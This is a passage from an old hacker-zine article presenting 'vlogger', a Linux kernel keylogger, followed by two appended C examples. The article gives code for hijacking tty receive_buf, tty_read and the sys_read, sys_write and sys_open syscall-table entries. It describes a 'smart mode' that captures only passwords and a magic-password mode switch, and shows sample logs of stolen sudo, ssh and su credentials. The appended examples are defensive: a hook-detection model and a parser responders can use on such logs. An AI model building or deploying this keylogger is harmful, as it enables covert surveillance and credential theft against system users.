...
}

# /usr/include/linux/tty_ldisc.h
struct tty_ldisc {
	int	magic;
	char	*name;
	...
	void	(*receive_buf)(struct tty_struct *, const unsigned char *cp,
			       char *fp, int count);
	int	(*receive_room)(struct tty_struct *);
	void	(*write_wakeup)(struct tty_struct *);
};

To intercept this function, we can save the original tty receive_buf()
function, then set ldisc.receive_buf to our own new_receive_buf() function
in order to log user inputs.

Ex: to log inputs on tty0

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
struct tty_struct *tty = file->private_data;
old_receive_buf = tty->ldisc.receive_buf;
tty->ldisc.receive_buf = new_receive_buf;

void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
		     char *fp, int count)
{
	logging(tty, cp, count);	// log inputs
	/* call the original receive_buf */
	(*old_receive_buf)(tty, cp, fp, count);
}

------[ 3.2.4 - tty_read

This function is called when a process wants to read input characters
from a tty via the sys_read() function.

# /usr/src/linux/drivers/char/tty_io.c
static ssize_t tty_read(struct file * file, char * buf, size_t count,
			loff_t *ppos)

static struct file_operations tty_fops = {
	llseek:		tty_lseek,
	read:		tty_read,
	write:		tty_write,
	poll:		tty_poll,
	ioctl:		tty_ioctl,
	open:		tty_open,
	release:	tty_release,
	fasync:		tty_fasync,
};

To log inputs on tty0:

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
old_tty_read = file->f_op->read;
file->f_op->read = new_tty_read;

------[ 3.2.5 - sys_read/sys_write

We will intercept the sys_read/sys_write system calls to redirect them to
our own code, which logs the content of the read/write calls. This method
was presented by halflife in Phrack 50 (see [4]). I highly recommend
reading that paper and a great article written by pragmatic called
"Complete Linux Loadable Kernel Modules" (see [2]).

The code to intercept sys_read/sys_write will be something like this:

extern void *sys_call_table[];
original_sys_read = sys_call_table[__NR_read];
sys_call_table[__NR_read] = new_sys_read;

--[ 4 - vlogger

This part will introduce my kernel keylogger, which uses the method
described in section 3.2.3 to gain more abilities than common keyloggers
that use the sys_read/sys_write syscall replacement approach. I have tested
the code with the following versions of the Linux kernel: 2.4.5, 2.4.7,
2.4.17 and 2.4.18.

----[ 4.1 - The syscall/tty approach

To log both local (logged from the console) and remote sessions, I chose
the method of intercepting the receive_buf() function (see 3.2.3).

In the kernel, the tty_struct and tty_queue structures are dynamically
allocated only when the tty is opened. Thus, we also have to intercept the
sys_open syscall so that we can dynamically hook the receive_buf() function
of each tty or pty when it is opened.

// to intercept open syscall
original_sys_open = sys_call_table[__NR_open];
sys_call_table[__NR_open] = new_sys_open;

// new_sys_open()
asmlinkage int new_sys_open(const char *filename, int flags, int mode)
{
	...
	// call the original_sys_open
	ret = (*original_sys_open)(filename, flags, mode);

	if (ret >= 0) {
		struct tty_struct * tty;
		...
		file = fget(ret);
		tty = file->private_data;

		if (tty != NULL &&
		    ...
		    tty->ldisc.receive_buf != new_receive_buf) {
			...
			// save the old receive_buf
			old_receive_buf = tty->ldisc.receive_buf;
			...
			/*
			 * init to intercept receive_buf of this tty
			 * tty->ldisc.receive_buf = new_receive_buf;
			 */
			init_tty(tty, TTY_INDEX(tty));
		}
		...
	}
	...
}

// our new receive_buf() function
void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
		     char *fp, int count)
{
	if (!tty->real_raw && !tty->raw)	// ignore raw mode
		// call our logging function to log user inputs
		vlogger_process(tty, cp, count);

	// call the original receive_buf
	(*old_receive_buf)(tty, cp, fp, count);
}

----[ 4.2 - Features

- Logs both local and remote sessions (via tty & pts)
- Separate logging for each tty/session. Each tty has its own logging
  buffer.
- Supports nearly all special chars such as arrow keys (left, right, up,
  down), F1 to F12, Shift+F1 to Shift+F12, Tab, Insert, Delete, End, Home,
  Page Up, Page Down, BackSpace, ...
- Supports some line editing keys, including CTRL-U and BackSpace.
- Timestamp logging, with timezone support (ripped off some code from
  libc).
- Multiple logging modes
  o dumb mode: logs all keystrokes
  o smart mode: detects the password prompt automatically and logs only
    user/password. I used a technique similar to the one presented in the
    "Passive Analysis of SSH (Secure Shell) Traffic" paper by Solar
    Designer and Dug Song (see [6]). When the application turns input
    echoing off, we assume that it is for entering a password.
  o normal mode: disable logging

You can switch between logging modes by using a magic password.

#define VK_TOGLE_CHAR	29		// CTRL-]
#define MAGIC_PASS	"31337"		// to switch mode, type MAGIC_PASS
					// then press VK_TOGLE_CHAR key

----[ 4.3 - How to use

Change the following options

// directory to store log files
#define LOG_DIR		"/tmp/log"

// your local timezone
#define TIMEZONE	7*60*60		// GMT+7

// your magic password
#define MAGIC_PASS	"31337"

Below is how the log files look:

[root@localhost log]# ls -l
total 60
-rw-------    1 root     root          633 Jun 19 20:59 pass.log
-rw-------    1 root     root        37593 Jun 19 18:51 pts11
-rw-------    1 root     root           56 Jun 19 19:00 pts20
-rw-------    1 root     root          746 Jun 19 20:06 pts26
-rw-------    1 root     root          116 Jun 19 19:57 pts29
-rw-------    1 root     root         3219 Jun 19 21:30 tty1
-rw-------    1 root     root        18028 Jun 19 20:54 tty2

---in dumb mode

[root@localhost log]# head tty2 // local session
<19/06/2002-20:53:47 uid=501 bash> pwd
<19/06/2002-20:53:51 uid=501 bash> uname -a
<19/06/2002-20:53:53 uid=501 bash> lsmod
<19/06/2002-20:53:56 uid=501 bash> pwd
<19/06/2002-20:54:05 uid=501 bash> cd /var/log
<19/06/2002-20:54:13 uid=501 bash> tail messages
<19/06/2002-20:54:21 uid=501 bash> cd ~
<19/06/2002-20:54:22 uid=501 bash> ls
<19/06/2002-20:54:29 uid=501 bash> tty
<19/06/2002-20:54:29 uid=501 bash> [UP]

[root@localhost log]# tail pts11 // remote session
<19/06/2002-18:48:27 uid=0 bash> cd new
<19/06/2002-18:48:28 uid=0 bash> cp -p ~/code .
<19/06/2002-18:48:21 uid=0 bash> lsmod
<19/06/2002-18:48:27 uid=0 bash> cd /va[TAB][^H][^H]tmp/log/
<19/06/2002-18:48:28 uid=0 bash> ls -l
<19/06/2002-18:48:30 uid=0 bash> tail pts11
<19/06/2002-18:48:38 uid=0 bash> [UP] | more
<19/06/2002-18:50:44 uid=0 bash> vi vlogertxt
<19/06/2002-18:50:48 uid=0 vi> :q
<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger

---in smart mode

[root@localhost log]# cat pass.log
[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]
USER/CMD sudo traceroute yahoo.com
PASS 5hgt6d
PASS

[19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]
USER/CMD ssh guest@host.com
PASS guest

[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]
USER/CMD open ftp.ilog.fr
USER Anonymous
PASS heh@heh

[19/06/2002-20:59:54 tty=pts/29 uid=504 su]
USER/CMD su -
PASS asdf1234

Please check http://www.thehackerschoice.com/ for updates on the new
version of this tool.

--[ 5 - Greets

Thanks to plasmoid, skyper for your very useful comments
Greets to THC, vnsecurity and all friends
Finally, thanks to mr. thang for English corrections

--[ 6 - References

[1] Linux Kernel Module Programming
    http://www.tldp.org/LDP/lkmpg/
[2] Complete Linux Loadable Kernel Modules - Pragmatic
    http://www.thehackerschoice.com/papers/LKM_HACKING.html
[3] The Linux keyboard driver - Andries Brouwer
    http://www.linuxjournal.com/lj-issues/issue14/1080.html
[4] Abuse of the Linux Kernel for Fun and Profit - Halflife
    http://www.phrack.com/phrack/50/P50-05
[5] Kernel function hijacking - Silvio Cesare
    http://www.big.net.au/~silvio/kernel-hijack.txt
[6] Passive Analysis of SSH (Secure Shell) Traffic - Solar Designer
    http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt
[7] Kernel Based Keylogger - Mercenary
    http://packetstorm.decepticons.org/UNIX/security/kernel.keylogger.txt

|=[ EOF ]=---------------------------------------------------------------=|
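Added example, not part of the article and not vlogger's own code: a user-space model of the function-pointer interception used in sections 3.2.3, 3.2.5 and 4.1 (save the original pointer, install a wrapper that passes through to it), paired with the check a defender relies on against it: comparing the live pointer in an ops table against a known-good value. Every name here (ldisc_model, driver_deliver, install_hook, snapshot_baseline) is a hypothetical stand-in for the kernel structures the article names; nothing touches a real tty or syscall table.

```c
/* Added example, not from the vlogger article: a user-space model of
 * ops-table hooking plus a pointer-integrity check. All names are
 * hypothetical stand-ins for struct tty_ldisc / sys_call_table. */
#include <stdio.h>
#include <string.h>

typedef void (*receive_fn)(const unsigned char *cp, int count);

/* Stand-in for struct tty_ldisc: one function pointer the driver calls */
struct ldisc_model {
    const char *name;
    receive_fn  receive_buf;
};

/* Stand-in for the legitimate line discipline: copies input onward */
static unsigned char delivered[64];
static int delivered_len;

static void real_receive_buf(const unsigned char *cp, int count) {
    if (count > (int)sizeof delivered) count = (int)sizeof delivered;
    memcpy(delivered, cp, (size_t)count);
    delivered_len = count;
}

/* Stand-in for a hook: record the bytes, then pass through unchanged,
 * which is why the caller cannot tell the difference by behaviour alone */
static receive_fn old_receive_buf;
static unsigned char captured[64];
static int captured_len;

static void hooked_receive_buf(const unsigned char *cp, int count) {
    if (count > (int)sizeof captured) count = (int)sizeof captured;
    memcpy(captured, cp, (size_t)count);
    captured_len = count;
    old_receive_buf(cp, count);
}

struct ldisc_model tty_ldisc = { "n_tty", real_receive_buf };

/* Known-good value of the pointer. In a real checker this would come from
 * a trusted source (e.g. symbol addresses recorded at install time), not
 * from the running structure after it may already have been modified. */
static receive_fn baseline_receive_buf;

void snapshot_baseline(void) { baseline_receive_buf = tty_ldisc.receive_buf; }

/* Integrity check: 1 if the live pointer no longer matches the baseline */
int ldisc_pointer_tampered(void) {
    return tty_ldisc.receive_buf != baseline_receive_buf;
}

/* Driver side: delivering input looks identical whether hooked or not */
void driver_deliver(const unsigned char *cp, int count) {
    tty_ldisc.receive_buf(cp, count);
}

/* The save-and-replace pattern from the article, in user space */
void install_hook(void) {
    old_receive_buf = tty_ldisc.receive_buf;
    tty_ldisc.receive_buf = hooked_receive_buf;
}

void remove_hook(void) {
    tty_ldisc.receive_buf = old_receive_buf;
}

int main(void) {
    snapshot_baseline();
    driver_deliver((const unsigned char *)"ls\n", 3);
    printf("before hook: tampered=%d captured=%d delivered=%d\n",
           ldisc_pointer_tampered(), captured_len, delivered_len);
    install_hook();
    driver_deliver((const unsigned char *)"id\n", 3);
    printf("after hook:  tampered=%d captured=%d delivered=%d\n",
           ldisc_pointer_tampered(), captured_len, delivered_len);
    remove_hook();
    printf("after unhook: tampered=%d\n", ldisc_pointer_tampered());
    return 0;
}
```

The point the model makes: delivered input is identical before and after the hook, so nothing observable from the consumer side changes; only a comparison of the pointer itself against a value obtained from a trusted source exposes the swap. A baseline taken after the hook is already in place is worthless, which is why the snapshot must predate any untrusted code.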
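Added example, not part of the article and not vlogger's own code: a parser for the dumb-mode log format shown in section 4.3 (`<DD/MM/YYYY-HH:MM:SS uid=N prog> command`), the kind of triage tool an incident responder writes after finding such a log directory on a host, to tabulate which uid typed what and when. The sample lines are constructed from the article's listing; the function names are hypothetical.

```c
/* Added example, not from the vlogger article: parse dumb-mode log lines
 * of the form "<DD/MM/YYYY-HH:MM:SS uid=N prog> command" into records.
 * Sample input below is constructed from the article's listing. */
#include <stdio.h>
#include <string.h>

struct vlog_entry {
    int  day, mon, year, hour, min, sec;
    int  uid;
    char prog[32];
    char cmd[256];
};

/* Parse one line; returns 1 on success, 0 if the line is not in the format */
int parse_vlog_line(const char *line, struct vlog_entry *e) {
    int n = 0;
    memset(e, 0, sizeof *e);
    /* %n records how far the header reached; sscanf does not count it */
    if (sscanf(line, "<%d/%d/%d-%d:%d:%d uid=%d %31[^>]>%n",
               &e->day, &e->mon, &e->year, &e->hour, &e->min, &e->sec,
               &e->uid, e->prog, &n) != 8)
        return 0;
    const char *rest = line + n;
    while (*rest == ' ') rest++;
    strncpy(e->cmd, rest, sizeof e->cmd - 1);
    size_t len = strlen(e->cmd);
    if (len && e->cmd[len - 1] == '\n') e->cmd[len - 1] = '\0';
    return 1;
}

/* Parse a whole buffer line by line, skipping malformed lines;
 * returns the number of records stored in out[] (at most max) */
int parse_vlog_text(const char *text, struct vlog_entry *out, int max) {
    int count = 0;
    const char *p = text;
    while (*p && count < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (parse_vlog_line(line, &out[count])) count++;
        p = nl ? nl + 1 : p + len;
    }
    return count;
}

/* How many records belong to a given uid */
int count_uid(const struct vlog_entry *e, int n, int uid) {
    int c = 0;
    for (int i = 0; i < n; i++) if (e[i].uid == uid) c++;
    return c;
}

/* Constructed sample, taken from the formats in the article's listing;
 * the last line is deliberately malformed to show it is skipped */
static const char *sample_log =
    "<19/06/2002-20:53:47 uid=501 bash> pwd\n"
    "<19/06/2002-20:53:51 uid=501 bash> uname -a\n"
    "<19/06/2002-20:54:05 uid=501 bash> cd /var/log\n"
    "<19/06/2002-18:50:48 uid=0 vi> :q\n"
    "<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger\n"
    "not a log line\n";

int main(void) {
    struct vlog_entry ents[16];
    int n = parse_vlog_text(sample_log, ents, 16);
    for (int i = 0; i < n; i++)
        printf("%04d-%02d-%02d %02d:%02d:%02d uid=%-4d %-6s %s\n",
               ents[i].year, ents[i].mon, ents[i].day,
               ents[i].hour, ents[i].min, ents[i].sec,
               ents[i].uid, ents[i].prog, ents[i].cmd);
    printf("records: %d (uid 0: %d, uid 501: %d)\n",
           n, count_uid(ents, n, 0), count_uid(ents, n, 501));
    return 0;
}
```

Special-key markers such as `[UP]` and `[TAB]` are left inside `cmd` as literal text, since the article shows them inline with the keystrokes; a responder filtering for commands like `rmmod` can search the `cmd` field directly.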